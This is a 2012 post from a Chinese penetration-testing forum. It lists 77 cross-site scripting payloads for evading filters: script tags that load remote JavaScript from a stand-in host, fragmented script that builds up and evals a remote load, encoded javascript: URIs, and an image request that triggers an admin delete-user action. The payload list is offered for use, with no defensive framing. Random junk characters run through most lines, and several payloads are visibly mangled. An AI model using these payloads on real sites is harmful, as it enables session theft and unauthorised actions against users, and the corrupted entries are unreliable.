中国网络渗透测试联盟

标题: xss跨站脚本攻击汇总 [打印本页]
作者: admin    时间: 2012-9-5 14:56
标题: xss跨站脚本攻击汇总
貌似关于xss的资料t00ls比较少,看见好东西Copy过来,不知道有木有童鞋需要Mark的。
2 ]# E8 y! l& J8 Q" l
; s; ]0 E0 D( z& U1 Q3 G' l (1)普通的XSS JavaScript注入
- i9 k$ p& b$ Y1 a; P <SCRIPT SRC=http://3w.org/XSS/xss.js></SCRIPT>2 ]' r& A$ u4 B* x+ o; Z
, ]1 D/ v$ X7 G( v6 K
(2)IMG标签XSS使用JavaScript命令
, o1 g8 S  T$ `( F! }+ n, D <SCRIPT SRC=http://3w.org/XSS/xss.js></SCRIPT>
/ F/ k9 S' X, {  y# ]1 L1 u& b4 i3 o/ @8 V" C7 t
(3)IMG标签无分号无引号
; j: L# |  _+ K) |0 B7 e8 q <IMG SRC=javascript:alert(‘XSS’)>7 z! D0 W' |* ~

! a2 t' N" K1 V; e4 c (4)IMG标签大小写不敏感
& I; i! ~: k# m! D; D+ X/ S% \ <IMG SRC=JaVaScRiPt:alert(‘XSS’)>
: z: _% r) _+ m
, j* q! q9 ~" m) e (5)HTML编码(必须有分号)
( o' J  ?9 G6 g <IMG SRC=javascript:alert(“XSS”)>" Y1 X6 ?1 e5 d
0 w2 S4 Y  d  ]9 \2 M
(6)修正缺陷IMG标签6 r$ j0 }& }% B; l2 \( G
<IMG “”"><SCRIPT>alert(“XSS”)</SCRIPT>”>3 q/ X% p+ ~( n4 x! Q
7 P$ Q& U0 u4 @" w% X+ M( i
(7)formCharCode标签(计算器); s7 _9 k( @$ G) V, p7 e1 v& \! X
<IMG SRC=javascript:alert(String.fromCharCode(88,83,83))>
5 p/ f9 G4 _: [  Q, f$ T
' s1 L1 J2 G# m. ^* w' | (8)UTF-8的Unicode编码(计算器)% O. M6 \1 r5 }4 Z- r" A
<IMG SRC=jav..省略..S')>9 @$ ^# |0 X. P5 l! j" r7 P
& a# Z- W$ {4 k2 t  S4 R7 X/ d6 s
(9)7位的UTF-8的Unicode编码是没有分号的(计算器)0 ?* L5 }7 m3 o
<IMG SRC=jav..省略..S')>) ?& z  F4 j5 f; W9 G' J

8 c2 J% B# c+ N! ~# G  S3 p: h0 k (10)十六进制编码也是没有分号(计算器)* A. r+ Z4 ]0 S- p
<IMG SRC=&#x6A&#x61&#x76&#x61..省略..&#x58&#x53&#x53&#x27&#x29>
8 g0 W  y" {1 M
0 b: Z9 ]/ T0 b6 i2 } (11)嵌入式标签,将Javascript分开" }( G" o! @. T- [) a/ k* w
<IMG SRC=”jav ascript:alert(‘XSS’);”>
. H1 [$ h" f3 g6 o9 z0 W+ B6 j+ P- C7 j, n$ X$ N! f7 ~' W
(12)嵌入式编码标签,将Javascript分开
6 E) o9 N+ `: I+ H <IMG SRC=”jav ascript:alert(‘XSS’);”>! I6 f7 v2 p- r! V: S9 y9 o

2 R: x8 H" F% j (13)嵌入式换行符
: i- n$ a, M* y, t0 h( |2 q' d1 @ <IMG SRC=”jav ascript:alert(‘XSS’);”>6 J4 T- F; a7 x2 T. x% B
& I5 i8 G& e6 p8 U8 d! m: e
(14)嵌入式回车
& R1 e7 x. e% t4 e. v' C! f% _ <IMG SRC=”jav ascript:alert(‘XSS’);”>. c" @& Q' r; S- O
" \) G: Q1 i; X. I* i
(15)嵌入式多行注入JavaScript,这是XSS极端的例子  P+ [* M( X1 b
<IMG SRC=”javascript:alert(‘XSS‘)”>. N' D2 H6 x7 V' P- A; t
- X$ ^7 I3 T- I9 a$ M
(16)解决限制字符(要求同页面)
9 [( _- n! C' B& ~% }7 d <script>z=’document.’</script>6 T- U! Z( {  b$ k/ X! ?
<script>z=z+’write(“‘</script>
! x$ N/ S/ e" Z* e) l <script>z=z+’<script’</script>9 _. e! u  V  r3 R$ a
<script>z=z+’ src=ht’</script>
5 j9 Y+ E) ~& I <script>z=z+’tp://ww’</script>
( K1 }& C% [# _5 K8 d <script>z=z+’w.shell’</script>
+ i0 ^& w4 g! A <script>z=z+’.net/1.’</script>
8 A) t  T# ^  T- D8 b; n3 U <script>z=z+’js></sc’</script>
# K" ^* e3 t3 E <script>z=z+’ript>”)’</script>
6 d$ k" c: h6 o <script>eval_r(z)</script>
& o8 ]* h! ]" B% O5 b6 q- I
/ P% H% J  L, q1 A2 K* Z2 _# A1 }2 i (17)空字符
& Q/ \4 }1 c: b! ] perl -e ‘print “<IMG SRC=java\0script:alert(\”XSS\”)>”;’ > out  D* l2 D+ D+ V* C2 s

1 E* g. W' s8 ~3 r* q9 ]7 V# V (18)空字符2,空字符在国内基本没效果.因为没有地方可以利用3 Y/ G( t/ j9 Q! g% p
perl -e ‘print “<SCR\0IPT>alert(\”XSS\”)</SCR\0IPT>”;’ > out
) M4 q' O: n- ]! w" P
" [, M# i# G# ^' c (19)Spaces和meta前的IMG标签
* w, Q" T( V% p; G: J <IMG SRC=”   javascript:alert(‘XSS’);”>: G" `& \) m! b  [# F  {& ^/ R

0 P& W( y. e5 l5 s) ~5 h0 M' Q (20)Non-alpha-non-digit XSS" s: O6 Y1 \# p& ^5 L
<SCRIPT/XSS SRC=”http://3w.org/XSS/xss.js”></SCRIPT>
4 `! l% E) Q- l; O3 h3 A: S$ t
4 W4 j. q' K( ~' G; e1 }% v (21)Non-alpha-non-digit XSS to 2" L( f) ^( T" \  R; W7 P0 f/ R& q6 F& ?
<BODY onload!#$%&()*~+-_.,:;?@[/|\]^`=alert(“XSS”)>
. w/ H% }7 [, e2 W
7 M3 ?0 v4 u9 F# y: [" W1 |7 [$ Y' U (22)Non-alpha-non-digit XSS to 30 z5 u; N- K# E, g, B& r
<SCRIPT/SRC=”http://3w.org/XSS/xss.js”></SCRIPT>, l) t! X( ?3 w
6 K2 U, m3 T8 \- F2 E
(23)双开括号
& d3 C$ b, B( ]% {8 R$ Y4 Z <<SCRIPT>alert(“XSS”);//<</SCRIPT>
0 r: d* @5 U# L' T' p% q. e  C2 t5 t1 N  c
(24)无结束脚本标记(仅火狐等浏览器)3 r' J2 x- ~5 p" e# I% c
<SCRIPT SRC=http://3w.org/XSS/xss.js?<B>: ^6 g8 s  ^. o5 G" I) f. _9 J8 E

1 m2 h% r. ~% a: `7 q8 q (25)无结束脚本标记2
; ]& q. i! g) s6 C% y <SCRIPT SRC=//3w.org/XSS/xss.js>5 E6 F) A1 a' {" y( r9 D
2 w) Y* [' }3 k8 W' r+ U( [
(26)半开的HTML/JavaScript XSS
) }6 z7 Z) r: Y2 H( ?  V$ S <IMG SRC=”javascript:alert(‘XSS’)”* d1 F6 f; m7 C9 x6 `

" j3 O) r, x* ^* o. T (27)双开角括号
4 R% x0 t$ g( E  g, R5 t <iframe src=http://3w.org/XSS.html <
( N, c8 U/ ~, L( m' Y8 v+ K3 N- Q2 T+ Q7 W1 z* r5 W* G; M/ M4 S
(28)无单引号 双引号 分号
$ ]  P9 `8 u3 A( ~7 X% @ <SCRIPT>a=/XSS/2 `) C. `' S7 K9 k' L$ `/ R
alert(a.source)</SCRIPT>* }+ J6 `# Q/ t' f% p# Q

* a' z- n3 w- | (29)换码过滤的JavaScript
2 @& @6 b, ]( W: h6 {$ O \”;alert(‘XSS’);//
/ ?0 H) @/ S7 _1 Q
0 Z$ w+ d0 s& f2 o( M (30)结束Title标签" [; C$ f4 m& [% O% y
</TITLE><SCRIPT>alert(“XSS”);</SCRIPT>
8 F4 ^$ `4 y' u
0 V9 Q' H( Q4 F8 f# X4 H (31)Input Image
4 L& _9 N: p3 @2 A1 V8 \ <INPUT SRC=”javascript:alert(‘XSS’);”>
4 S! H9 k! m. j; F$ D5 z
. t9 w6 c/ U9 Q$ z: i7 L3 x& o9 e (32)BODY Image
+ b3 [& z$ t4 I: B <BODY BACKGROUND=”javascript:alert(‘XSS’)”>
( ?8 o/ g( u. g9 W/ u" N' \! W& G( F/ L' j/ ]
(33)BODY标签2 \# u0 e6 i5 d# V% w, L6 p. C
<BODY(‘XSS’)>
3 g7 B; X7 A1 p8 u3 ^9 f( @( `5 E4 d; q3 e5 _; v5 @: n% ~
(34)IMG Dynsrc
  Z. B, U8 ], a' ^: d2 b; i <IMG DYNSRC=”javascript:alert(‘XSS’)”>
# V" [# W0 q% W! e6 Z
  X, ~2 V# @5 v+ H& c (35)IMG Lowsrc
! n* \' o1 O8 t6 _, c$ K6 v <IMG LOWSRC=”javascript:alert(‘XSS’)”>
* Z3 z" M/ d, D. I$ l# D! P2 ^4 ?
2 L  Q" s# A8 |  ]" f! v$ Z  f+ m% n (36)BGSOUND
# q6 N, t5 Z; b: ~' u6 @ <BGSOUND SRC=”javascript:alert(‘XSS’);”>
# A) i, m7 W$ N9 w. B- V, A2 g9 n. R
(37)STYLE sheet
, _6 x5 u7 w8 ]% _ <LINK REL=”stylesheet” HREF=”javascript:alert(‘XSS’);”>
9 e1 z1 P6 G  |0 [6 v# H1 V9 O# r) u8 o$ D  z) @% ]: p$ F5 I
(38)远程样式表
8 s5 r+ n( G) N' {0 } <LINK REL=”stylesheet” HREF=”http://3w.org/xss.css”>
% d# Y) }# Z% E2 _* v! R  k! T& w; s# A+ C; t5 k
(39)List-style-image(列表式)
8 @$ K0 I# `3 K7 d3 B6 s7 g <STYLE>li {list-style-image: url(“javascript:alert(‘XSS’)”);}</STYLE><UL><LI>XSS9 c* E% S8 f$ X( ~( p3 J* V

1 L& m3 r: _& A& y2 G& B6 u! ]2 J$ r (40)IMG VBscript
" w4 L3 Q: ]- J( Q" @, u4 } <IMG SRC=’vbscript:msgbox(“XSS”)’></STYLE><UL><LI>XSS. [% D7 D# L3 W+ J0 i: A

: ?/ V8 Q2 v3 s5 i/ G- p (41)META链接url
1 H2 H: K4 j, W1 E* c <META HTTP-EQUIV=”refresh” CONTENT=”0; URL=http://;URL=javascript:alert(‘XSS’);”>/ _$ n# R3 r4 Z: d6 r
$ T8 y  `% Z8 j& Y: L
(42)Iframe9 y2 d1 X  ]8 ^$ u' c
<IFRAME SRC=”javascript:alert(‘XSS’);”></IFRAME>
- _8 n4 g- i( ~0 O. \/ G5 P9 y( {
0 _1 u- ]1 k  { (43)Frame# `( J2 ?- T7 D; c1 C& b& o2 h
<FRAMESET><FRAME SRC=”javascript:alert(‘XSS’);”></FRAMESET>
- z" B6 e) H1 Z; V  k: w; ^6 Q6 C3 d: j) O& Y- a5 V
(44)Table6 @7 Y& D) h9 }8 p
<TABLE BACKGROUND=”javascript:alert(‘XSS’)”>9 y, U  x6 r( B, q& c1 w/ @7 h

1 U* r8 o1 a3 Q2 X5 S9 v# T (45)TD; |- q  A) m7 K/ [& y  z; X( G
<TABLE><TD BACKGROUND=”javascript:alert(‘XSS’)”>6 V" P, ]9 m, p
% t; g9 k4 D  r  I3 h/ |/ ]
(46)DIV background-image" V6 Q+ l4 h8 g# ?6 N
<DIV STYLE=”background-image: url(javascript:alert(‘XSS’))”>
; i. Y& T: d5 ^  m1 L( M% R5 @. e9 W; B7 {0 U2 K
(47)DIV background-image后加上额外字符(1-32&34&39&160&8192-8&13&12288&65279)
" D4 Q1 x8 |0 b5 y. C( p. C <DIV STYLE=”background-image: url(javascript:alert(‘XSS’))”>7 s6 v" R3 I4 V+ P% J' p  r/ N3 m

2 ^8 `( ]) q$ x/ _' R (48)DIV expression& S  G6 W& V$ `, r1 C
<DIV STYLE=”width: expression_r(alert(‘XSS’));”># q' m. u2 l- `* V+ X
/ S( i2 A1 f' X% Z9 M# L
(49)STYLE属性分拆表达: `/ d2 {' h; F3 O
<IMG STYLE=”xss:expression_r(alert(‘XSS’))”>
+ A1 [8 H, l- j0 G+ T4 T& I
7 q  J* B" \1 U, X- {3 n0 N (50)匿名STYLE(组成:开角号和一个字母开头)
9 y# F2 F: r  p! P( y! i6 } <XSS STYLE=”xss:expression_r(alert(‘XSS’))”>
! z3 k  O' N3 v; J5 ?/ ]' ?: Q6 V/ I
(51)STYLE background-image
! i' z1 h2 N' j& g0 h <STYLE>.XSS{background-image:url(“javascript:alert(‘XSS’)”);}</STYLE><A CLASS=XSS></A>+ o& ]2 u" H+ l* p" G5 [
0 Z# j) U8 z4 u% J0 _
(52)IMG STYLE方式6 X* A. t. w& R
exppression(alert(“XSS”))’>
" q& J6 T8 U9 [; n6 ^
9 o, e5 A/ i6 @' h' l" y (53)STYLE background+ b( z, g, S& ]0 \" h  o
<STYLE><STYLE type=”text/css”>BODY{background:url(“javascript:alert(‘XSS’)”)}</STYLE>
1 h% ]% \* ]" {5 b# H. Q% b5 [% H, }1 U
(54)BASE# U! G2 A! V- C8 {* H. p
<BASE HREF=”javascript:alert(‘XSS’);//”>! s5 w. h* z. [8 |

6 N4 m  v, h! I" T/ ?9 U (55)EMBED标签,你可以嵌入FLASH,其中包涵XSS
3 a5 o  v+ ~. v: k" h+ } <EMBED SRC=”http://3w.org/XSS/xss.swf” ></EMBED>* ?# P: }- D. R. o. `1 ^7 o* T; }

! t3 ~5 q% K7 V! v" i4 K: a! k (56)在flash中使用ActionScrpt可以混进你XSS的代码9 T) g9 P; l  f( C( h$ m: J0 \: I
a=”get”;
( @3 s% ]) g) f$ D' b# B b=”URL(\”";
1 U2 [; k3 _6 }, k. P c=”javascript:”;* e% T8 d# J% g6 E" w+ }
d=”alert(‘XSS’);\”)”;6 n: H4 P1 [! X& f) s% Z( Z+ A. d
eval_r(a+b+c+d);
8 _: p' c9 \6 r7 ~# R& K: n
* ~8 S% i" A0 O% r1 R- i: q: c1 h* q (57)XML namespace.HTC文件必须和你的XSS载体在一台服务器上; T; L9 O! }: {! @1 y
<HTML xmlns:xss>: ~& r& G' g0 v( O( B
<?import namespace=”xss” implementation=”http://3w.org/XSS/xss.htc”>
) H3 f" A8 t$ Z! c <xss:xss>XSS</xss:xss>
# D2 z9 s6 m! g/ D3 i" g" H </HTML>' z7 d' |3 _4 y+ U" N5 m
( y6 e! V, V: T7 e1 P
(58)如果过滤了你的JS你可以在图片里添加JS代码来利用
: n* h  K( L: ?  ?/ b  H <SCRIPT SRC=””></SCRIPT>
+ c2 `: h8 K) t. z; w( |% C
' }: ~, p+ Z" M: u* N( Y! n (59)IMG嵌入式命令,可执行任意命令
6 U5 a! {6 o5 o% z <IMG SRC=”http://www.XXX.com/a.php?a=b”>
# s6 r1 }2 L- f& b
  w! r, G1 E* ?* k( l  o (60)IMG嵌入式命令(a.jpg在同服务器)( s; m& T! w/ b
Redirect 302 /a.jpg http://www.XXX.com/admin.asp&deleteuser
8 x4 k- g0 C+ Z; [6 i
/ Y4 V6 x: G+ q0 [3 J (61)绕符号过滤  y& a& l% m1 ^
<SCRIPT a=”>” SRC=”http://3w.org/xss.js”></SCRIPT>
5 ^- ~, E6 d7 _; V- E
. `* k+ X$ @5 G4 } (62)
9 S0 j7 C( O) h. T4 D8 s0 b <SCRIPT =”>” SRC=”http://3w.org/xss.js”></SCRIPT>8 Q( u2 e( N) L3 ^) Y
$ c! u. P8 e8 ]3 c5 \- k& r8 M5 B
(63)
2 }, ^$ ~" V4 k0 f* v% G <SCRIPT a=”>” ” SRC=”http://3w.org/xss.js”></SCRIPT>/ H* Z1 p/ Y7 H+ Z
) Z9 X4 S* P( `0 N) }  @
(64)6 |0 v8 M7 R7 @3 r
<SCRIPT “a=’>’” SRC=”http://3w.org/xss.js”></SCRIPT>
1 ?9 F$ x$ ]% `! O" |7 D
: f- I$ c* o5 ?8 } (65)
  C1 F4 h& U1 N) T; Y: I- E  o <SCRIPT a=`>` SRC=”http://3w.org/xss.js”></SCRIPT>, R- Z' u6 G, I

( u! {9 L, i0 j  l6 L (66): V/ Z" P2 z+ {( R* p7 U
<SCRIPT a=”>’>” SRC=”http://3w.org/xss.js”></SCRIPT>
& d5 r9 k3 F6 [9 _9 B
- q# t4 u$ D8 X5 A (67)
- x/ @, F2 J1 j+ f) @# G <SCRIPT>document.write(“<SCRI”);</SCRIPT>PT SRC=”http://3w.org/xss.js”></SCRIPT>. A( G2 L4 L, P: n- f7 G+ g
' s, ^! O5 U* G" t, N* u- V
(68)URL绕行
: f! o6 q  `' u6 H <A HREF=”http://127.0.0.1/”>XSS</A>$ W& N9 u  M: K1 f8 j- P* \
/ Q% y6 n6 E/ I+ T! F9 B; n. v6 z
(69)URL编码
$ B1 y* J' {) k2 O2 J& L <A HREF=”http://3w.org”>XSS</A>9 V' }* I- U: X+ k4 T

3 R9 _( ]0 M+ a' { (70)IP十进制9 }6 V5 G5 X5 H" R
<A HREF=”http://3232235521″>XSS</A>
* i6 Y3 x6 O* j! }5 k/ M% u" N8 @( w" D6 M9 l
(71)IP十六进制
+ [7 ]6 D3 K, z+ `+ t, _ <A HREF=”http://0xc0.0xa8.0×00.0×01″>XSS</A>
* V2 q' @. j7 V  I2 P8 |7 u
$ v# b" \& ~6 G& j5 @5 M (72)IP八进制
- {0 H: B3 g) M1 }( b/ a <A HREF=”http://0300.0250.0000.0001″>XSS</A>( u  n0 ~/ ~6 w, q9 z- c

( s5 ~' J: l  g+ X (73)混合编码4 b4 E* m; F4 b4 o
<A HREF=”h; a% z7 X" U' S6 L: t4 g& \+ [
tt p://6 6.000146.0×7.147/”">XSS</A>
4 q1 r/ c& }1 l- Q4 h9 R+ A9 f4 K: {7 i  e
(74)节省[http:]
$ {. {* t1 a# D+ O <A HREF=”//www.google.com/”>XSS</A>
# w6 e0 u) @1 Q+ |! f6 ^' H0 r1 v# {7 K' ~7 G4 ]- i9 D7 X5 K! H1 x
(75)节省[www]
5 {1 g/ B7 [( @; Y4 K <A HREF=”http://google.com/”>XSS</A>
' Q& C8 m) N3 o% K3 v) ]& N; q$ W
% U. ~+ J% j) K9 B/ Q (76)绝对点绝对DNS
; Z+ b4 ]8 ^% I6 c0 j, ^3 w" X <A HREF=”http://www.google.com./”>XSS</A>
# b& q7 p* o" p% I/ o$ ^' u2 v) M6 }6 O4 B; a4 `
(77)javascript链接) e( u1 O# i! A# }
<A HREF=”javascript:document.location=’http://www.google.com/’”>XSS</A>



欢迎光临 中国网络渗透测试联盟 (https://cobjon.com/) Powered by Discuz! X3.2